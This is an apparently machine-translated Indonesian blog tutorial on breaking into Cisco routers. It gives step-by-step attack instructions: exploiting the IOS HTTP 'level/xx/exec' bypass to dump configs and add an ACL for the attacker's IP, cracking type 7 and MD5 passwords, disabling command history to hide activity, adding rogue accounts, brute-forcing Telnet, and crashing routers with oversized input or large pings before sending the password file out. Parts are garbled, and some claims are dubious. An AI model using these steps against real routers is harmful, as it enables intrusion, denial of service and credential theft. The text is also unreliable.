Cara Hacking Cisco Routers

Router adalah lapisan 3 perangkat yang digunakan untuk LAN dan WAN komunikasi (Terutama digunakan untuk komunikasi WAN). Ia melakukan fungsi pada lapisan jaringan model OSI. Menggunakan alamat IP untuk mengirim dan menerima informasi pada jaringan.

Topik ini akan lebih mudah bagi para pembaca yang memiliki pengalaman pada router. Jika Anda tidak punya pengalaman pada router maka Anda mungkin menemukan topik ini aneh.

Mengapa kita ingin hack router Cisco?

Alasannya adalah bahwa cisco merupakan router microsoft. 60% dari router di dunia adalah milik Cisco.

Router adalah perangkat yang kuat dengan kecepatan tinggi, jadi jika Anda mendapatkan kontrol atas router maka Anda dapat menggunakannya untuk berbagai tujuan seperti menerapkan DoS / DDos serangan, sistem lain hacking, mengendus lalu lintas. dll

Jadi tugas pertama kami di router cisco hacking adalah untuk menemukan router cisco pada jaringan.

Mencari cisco router adalah tugas yang cukup mudah, hampir setiap ISP akan rute melalui setidaknya satu router cisco. Cara termudah untuk menemukan sebuah router cisco adalah dengan menjalankan traceroute dari dos (ketik "tracert" dan maka alamat IP komputer seseorang atau website), Untuk misalnya:

Dalam ketik cmd berikut & tekan enter:



tracert www.facebook.com



Alih-alih facebook.com Anda dapat mengetikkan alamat website atau alamat IP. Anda dapat melacak cukup banyak orang karena jejak akan menunjukkan semua sistem komputer antara komputer Anda dan komputer mereka. Salah satu sistem ini mungkin akan memiliki nama "cisco" dalam nama itu. Jika Anda menemukan satu seperti ini, menyalin itu alamat IP.

Sekarang Anda memiliki lokasi router cisco, tetapi mungkin memiliki firewall melindunginya, sehingga Anda harus melihat apakah itu diblokir oleh ping beberapa kali, jika Anda mendapatkan ping dikembalikan kepada Anda, itu tidak mungkin terhalang. Cara lain adalah mencoba untuk mengakses beberapa port router cisco, Anda dapat melakukannya hanya dengan menggunakan telnet, dan membuka koneksi ke router pada port 23. Jika meminta password, tetapi tidak ada nama pengguna, Anda berada di router, tetapi jika ia ingin username juga, Anda mungkin di firewall atau menggunakan beberapa cara lain untuk otentikasi.



Mengidentifikasi Router Cisco:



Beberapa administrator mengkonfigurasi router sedemikian rupa sehingga sulit untuk mengenalinya

Router dapat dikonfigurasi untuk melihat seperti sistem lain pada jaringan - mereka dapat menjalankan web server, daemon SSH, chargen, dan mereka bahkan dapat terlihat menjalankan X server beberapa. Untuk alasan ini, mereka dapat mungkin sering keliru sebagai sistem Unix.

Mungkin cara termudah dan paling akurat untuk mengidentifikasi host pada jaringan sebagai router adalah dengan menggunakan Nmap - scanner port yang terhormat dengan OS fingerprinting yang sangat akurat. Scan port router Cisco khas memberitahu kita tentang hal berikut:



Menarik port pada router:

7, 9, 13, 19, 23, 79, 2001, 4001, 6001, 9001,



Jika layanan login seperti telnet atau SSH dapat diakses, satu hanya dapat menggunakan klien telnet standar dan terhubung ke port yang sesuai. Sebuah router Cisco dasar dengan ip 10.0.0.1 mungkin terlihat seperti berikut:

C: \> telnet 10.0.0.1

Mencoba 10.0.0.1 ...

Terhubung ke 10.0.0.1. Escape character is'^]'.

Akses Pengguna Verifikasi

Sandi:



The "Akses Pengguna Verifikasi" garis adalah merek dagang Cisco telnet banner. Tentu saja orang tidak dapat mengandalkan spanduk sendiri, karena administrator sistem kadang-kadang mengubah mereka untuk alasan menipu. Satu dapat mengubah spanduk dengan menggunakan perintah spanduk motd dari mode CLI router Global.



Mengidentifikasi Kerentanan:



Kerentanan scanner biasanya melakukan pekerjaan yang besar dalam mengidentifikasi kerentanan diketahui, tetapi sering dapat melewatkan kesalahan konfigurasi yang signifikan. Nessus 2.0.6 misalnya, memiliki daftar sekitar 44 string masyarakat untuk brute force daemon SNMP, yang mungkin cukup untuk menangkap penggunaan string komunitas standar umum seperti publik, dan swasta, tetapi tentu saja tidak dapat memperhitungkan spesifik lokasi akun string yang mungkin digunakan.



Pemanfaatan Kerentanan dalam Cisco IOS:



Sebuah kerentanan yang mempengaruhi kebanyakan router Cisco (ketika kondisi benar) adalah Kerentanan Konfigurasi Akses Administratif Sewenang-wenang HTTP. Ini kerentanan khusus harus ditemukan oleh semua scanner kerentanan, dan sepele untuk mengeksploitasi. Hal ini sering menghasilkan kontrol administratif penuh remote router terpengaruh. Alat penyerang pilihan hanyalah sebuah web browser. Penyerang akan memasukkan alamat URL router dalam ruang dan tekan enter,

untuk misalnya: Jika 10.0.0.1 adalah alamat router maka penyerang akan memasuki berikut di URL bar:



http://10.0.0.1



sekarang penyerang akan mendapatkan kotak Dialog Login yang akan meminta username dan password untuk login. Sekarang penyerang akan mengklik tombol Cancel dan kemudian penyerang akan memasukkan kode berikut sebagai alamat dalam ruang URL:



http:///level/xx/exec/



Dimana xx adalah nomor antara 16 dan 99.

Sebagai contoh: Mari 10.0.0.1 adalah alamat router, penyerang memasuki URL berikut ke address bar:

http://10.0.0.1/level/99/exec/show/config



perintah ini akan menyajikan konfigurasi startup dari perangkat. Konfigurasi akan terlihat mirip dengan berikut:



=================================================



Saat ini konfigurasi: 1204 byte

!

versi 12,2

tidak ada layanan enkripsi password

!

hostname kripto

!

!

enable secret 5 $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr.

memungkinkan sandi CCNA

!

nama pengguna crypt0 7 05331F35754843001754

!

ip ssh versi 1

!

antarmuka FastEthernet0 / 0

ip address 10.0.0.1 255.0.0.0

dupleks otomatis

kecepatan otomatis

!

antarmuka FastEthernet0 / 1

tidak ada alamat ip

dupleks otomatis

kecepatan otomatis

penutupan

!

antarmuka serial1 / 0

ip address 200.100.0.1 255.255.255.252

!

antarmuka serial1 / 1

tidak ada alamat ip

penutupan

!

antarmuka serial1 / 2

tidak ada alamat ip

penutupan

!

antarmuka serial1 / 3

tidak ada alamat ip

penutupan

!

router eigrp 50

jaringan 10.0.0.0

jaringan 200.100.0.0

tidak auto-summary

!

ip tanpa kelas

ip route 20.0.0.0 255.255.255.192 serial1 / 1

ip route 200.100.0.4 255.255.255.252 serial1 / 1

ip route 30.0.0.0 255.255.192.0 serial1 / 1

ip route 200.100.0.12 255.255.255.252 serial1 / 1

ip route 200.100.0.12 255.255.255.252 serial1 / 0

ip route 30.0.0.0 255.255.192.0 serial1 / 0

ip route 200.100.0.4 255.255.255.252 serial1 / 0

ip route 20.0.0.0 255.255.255.192 serial1 / 0

ip route 40.0.0.0 255.255.255.240 serial1 / 0

ip route 50.0.0.0 255.240.0.0 serial1 / 0

ip route 200.100.0.8 255.255.255.252 serial1 / 0

!

!

spanduk motd ^ C

halo ^ C

garis con 0

line vty 0 4

sandi CCNP

login

!

!

akhir

=============================================



Sekarang kita dapat dengan mudah melihat semua konfigurasi router. Kita bisa mempelajari ini untuk hack lebih lanjut dalam router.



Cracking password:



Ada tiga metode IOS dapat digunakan untuk mewakili sandi pada file konfigurasi router. Mereka adalah:

1. Hapus Teks

2. Vigenere

3. MD5



Dalam kasus teks yang jelas Anda akan melihat sesuatu seperti ini di konfigurasi:

memungkinkan sandi passwd



Berikut passwd adalah password. Seperti dalam konfigurasi di atas Anda dapat melihat bahwa password teks yang jelas adalah CCNA.



Dalam kasus Vigenere Anda akan melihat sesuatu seperti berikut di konfigurasi:

memungkinkan sandi 7 104B0718071B17



di sini adalah password terenkripsi 104B0718071B17.



Dalam kasus MD5 Anda akan melihat sesuatu seperti berikut:



enable secret 5 $ 1 $ yOMG $ 38ZIcsEmMaIjsCyQM6hya0



Di sini $ 1 $ $ yOMG 38ZIcsEmMaIjsCyQM6hya0 adalah password terenkripsi. Sebagai contoh di konfigurasi di atas $ 1 $ $ V3AzF/pAhvRvjIsUimrC8 Merr. adalah password terenkripsi.



Sekarang Anda tahu semua tentang password sehingga memungkinkan mereka mulai retak.

Ada cara dengan mana Anda dapat dengan mudah mereset password router tapi perlu akses fisik. Jadi kita tidak akan membahas itu. Hal ini pada dasarnya dilakukan dengan menggunakan mode Rommn dari router.

Kami akan membahas cara-cara remote untuk memecahkan password.

Sekarang dalam kasus password teks yang jelas Anda tidak perlu untuk memecahkan apa-apa karena password dalam teks yang jelas sudah. lol ;-)

Dalam kasus Vigenere password tidak dienkripsi sehingga sangat dapat retak dengan mudah dengan alat yang dikenal sebagai GetPass. Dalam alat ini Anda memasukkan password terenkripsi dan akan kembali Anda password teks yang jelas.

sekarang dalam kasus MD5 itu adalah kerja yang sibuk. MD5 adalah salah satu cara hash sehingga sulit untuk retak.

Jadi kita melakukan dictionary attack atau serangan brute force pada password ini dengan menggunakan alat seperti

Cain & Abel.



Bagaimana selama mungkin tidak mungkin untuk login ke router bahkan jika Anda memiliki mandat login jika ACL dikonfigurasi di router. Mungkin ada kemungkinan bahwa ACL adalah mencegah akses kami ke router. Jadi kita dapat membuat ACL untuk memberikan kita akses ke router. Kita dapat menggunakan perintah berikut. Ketik perintah berikut sebagai URL:



http://10.0.0.1/level/99/configure/access-list/100/permit/ip/host/10.0.0.2/any/CR



Sekarang dalam perintah di atas adalah IP 10.0.0.1 dan 10.0.0.2 router adalah IP kita. Anda perlu mengganti 10.0.0.2 dengan alamat IP mesin Anda.



Sekarang karena kami sudah mendapat akses untuk login di router. Jadi apa yang harus dilakukan setelah Anda punya akses ke router? Sekarang kita akan membahas beberapa percobaan yang dapat anda lakukan pada perangkat yang kuat.



1. Nonaktifkan Sejarah:

Satu bisa tahu perintah apa yang telah diketik pada router CLI dengan menggunakan perintah show sejarah. Jadi kita perlu menonaktifkan sejarah. Sejarah bisa dinonaktifkan dengan menggunakan perintah berikut pada mode hak istimewa router:



sejarah terminal ukuran nol



2. Cracking Account pengguna:



Beberapa kali ada akun pengguna pada router juga. Hal ini dapat dilihat dari file konfigurasi. Sebagai contoh di file konfigurasi di atas kita melihat sebuah user bernama crypt0 dan password account-nya. Sekarang tergantung pada teknik enkripsi yang digunakan untuk mengenkripsi password kita dapat memecahkan sandi. Jika Vigenere kita dapat menggunakan alat GetPass untuk mendapatkan password teks yang jelas dan jika itu adalah MD5 kita dapat menggunakan alat seperti Kain & Mampu untuk memecahkan password dari account itu dan kemudian kita dapat mengubah password dari akun itu juga. ;-) Kami juga dapat membuat pengguna lain pada router itu.

Perintah berikut ini digunakan untuk membuat user baru. Hal ini diketik dari mode global router:



nama pengguna kata sandi kripto tes



Berikut kripto adalah username dan tes adalah password.

Dalam rangka untuk menghapus menggunakan account perintah berikut dalam mode global router:



tidak ada username kripto



Berikut kripto adalah username yang ingin Anda hapus.





3. Memaksa brute-Layanan Login:



Layanan Login brute-memaksa seperti Telnet dan SSH dapat agak sulit dan sering ribut, tetapi juga dapat menghasilkan hasil yang positif bagi penyerang. Salah satu hal pertama yang harus dilakukan sebelum melakukan jenis serangan pada router adalah untuk menentukan apakah atau tidak router menggunakan beberapa jenis otentikasi diperpanjang seperti Tacacs atau Radius. Meskipun IOS tidak memiliki sarana native mengunci pengguna setelah X jumlah usaha login, lockouts dapat diaktifkan ketika otentikasi dilewatkan ke sistem lain melalui Tacacs atau Radius. Cara termudah untuk mengetahui apakah otentikasi sedang dilewatkan ke sistem lain adalah hanya terhubung ke router menggunakan klien Telnet standar.



C: \> telnet 10.0.0.1

Mencoba 10.0.0.1 ...

Terhubung ke 10.0.0.1. Escape character is'^]'.

Akses Pengguna Verifikasi

Username:



Jika perangkat meminta username, Anda hampir dapat yakin bahwa itu adalah menggunakan beberapa bentuk otentikasi diperpanjang. Dalam hal ini, Tacacs diimplementasikan dan brute-memaksa akan menjadi lebih sulit, karena penyerang akan harus menebak dua variabel, baik username dan password bukan hanya password. Jika jari berjalan, username dapat dikumpulkan, namun kemungkinan mengunci akun pengguna yang sah mungkin akan menghentikan penyerang besar dari melakukan semacam serangan. Tentu saja, jika Anda memiliki izin untuk menilai situs melalui "apa yang diperlukan" Anda masih mungkin ingin melakukan beberapa brute-memaksa hingga ambang lockout. Jika tidak diperpanjang maka hanya otentikasi password akan ditanyakan. Jika ditentukan bahwa otorisasi diperpanjang tidak digunakan, maka penyerang dapat brute force Telnet daemon. Brutus adalah alat berbasis Windows kasar-memaksa yang melakukan sejumlah protokol yang berbeda, dan dapat disesuaikan untuk protokol baru on the fly. THC itu hydra juga yang sangat baik, berbasis Unix alat yang sangat mampu brute memaksa sejumlah layanan yang berbeda.



Lama Teknik router hack:



Router Cisco v4.1 menjalankan perangkat lunak akan mudah dinonaktifkan. Anda hanya terhubung ke router pada port 23 melalui server proxy Anda, dan masukkan string password yang BESAR, sesuatu seperti:

10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv

019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgz

mxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeirutyalsk

djfhgzmxncbv019dsk10293847465qpwoeirutyalskdjfhgzmxncbv019dsk10293847465qpwoeiru

tyalskdjfhgzmxncbv019dsk

Sekarang tunggu, sistem cisco mungkin reboot, dalam hal ini Anda tidak dapat hack karena sedang offline. Tapi itu mungkin akan membeku selama 2-10 menit, yang harus Anda gunakan untuk mendapatkan masuk Jika tidak terjadi, maka tidak menjalankan perangkat lunak yang rentan, dalam hal ini Anda dapat mencoba beberapa serangan DoS, seperti ping besar .

Pergi ke dos dan ketik:



ping-l 65550-t 10.0.0.1



di sini 10.0.0.1 adalah ip router, ganti dengan ip router yang sebenarnya di mana Anda melakukan serangan. Ini akan melakukan trik yang sama untuk Anda.

Sementara itu masih beku, buka koneksi lain untuk itu dari beberapa proxy lain, dan menempatkan password sebagai "admin", alasan untuk ini adalah karena secara default, ini adalah password router, dan sementara

itu dinonaktifkan sementara, maka akan kembali ke keadaan default.

Sekarang bahwa Anda telah login, Anda harus mendapatkan file password! Sistem menjalankan perangkat lunak yang berbeda, tetapi kebanyakan akan memiliki prompt seperti "HTL-tekstil" sesuatu atau, sekarang ketik "?" untuk daftar

perintah, Anda akan melihat daftar besar perintah, suatu tempat di sana Anda akan menemukan perintah transfer, gunakan itu untuk mendapatkan password file dari admin (yang merupakan pengguna saat ini) dan kirimkan ke alamat IP Anda sendiri pada port 23. Tapi sebelum Anda melakukan ini, menyiapkan HyperTerminal untuk menunggu panggilan dari router cisco. Sekarang setelah Anda mengirim file, HyperTerminal akan menanyakan apakah Anda ingin menerima file yang mesin ini mengirimkan Anda, katakan ya dan simpan ke disk.

Sekarang bahwa Anda telah memperoleh file password, anda harus menghancurkan sehingga Anda dapat mengakses router lagi. Untuk melakukan ini, Anda dapat menjalankan program seperti John the Ripper atau Cain & Able pada file password, dan Anda dapat memecahkannya.


Sumber: http://yudhacintaratu.blogspot.co.id/2012/02/hacker-indonesia_03.html


Komentar